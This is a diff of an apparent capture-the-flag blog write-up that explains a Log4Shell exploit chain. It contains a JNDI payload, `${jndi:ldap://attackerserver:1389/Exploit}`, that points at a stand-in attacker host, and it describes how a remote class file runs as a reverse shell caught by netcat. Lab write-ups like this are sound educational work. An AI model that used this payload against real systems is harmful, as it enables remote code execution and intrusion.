sh3bu/shebu-hxor.github.io/_posts/2022-01-30-LumberjackTurtle.md

 Now we need to get a shell to move further.

-### Exploit-chain
+### Exploit

-This is how it works
+ _This is how it works_

 1. When we send the payload `${jndi:ldap://attackerserver:1389/Exploit}` - it reaches out to our LDAP server .
 2. The LDAP server forwards the request to our secondary server asking for the resource located at `http://attackerserver:8000/Exploit` .
 3. Secondary server serves the `Exploit.class` file.
-4. After retreiving , `the victim_server executes the code present in Exploit.class` (which is a reverse shell)
+4. After retreiving , `the victim_server executes the code present in Exploit.class` (which is basically a reverse shell)
 5. Once it executes , we get a reverse shell back on our netcat .

-I'll explain the steps one by one ,just follow me
+I'll explain the steps one by one , just follow me along .

 First things first we need `java version 8` on our machine in order to build the LDAP server .Create 4 terminal windows and follow the steps.
 > Note : Change VICTIM-IP with your Machine_IP and ATTACKER-IP to your tun0 IP!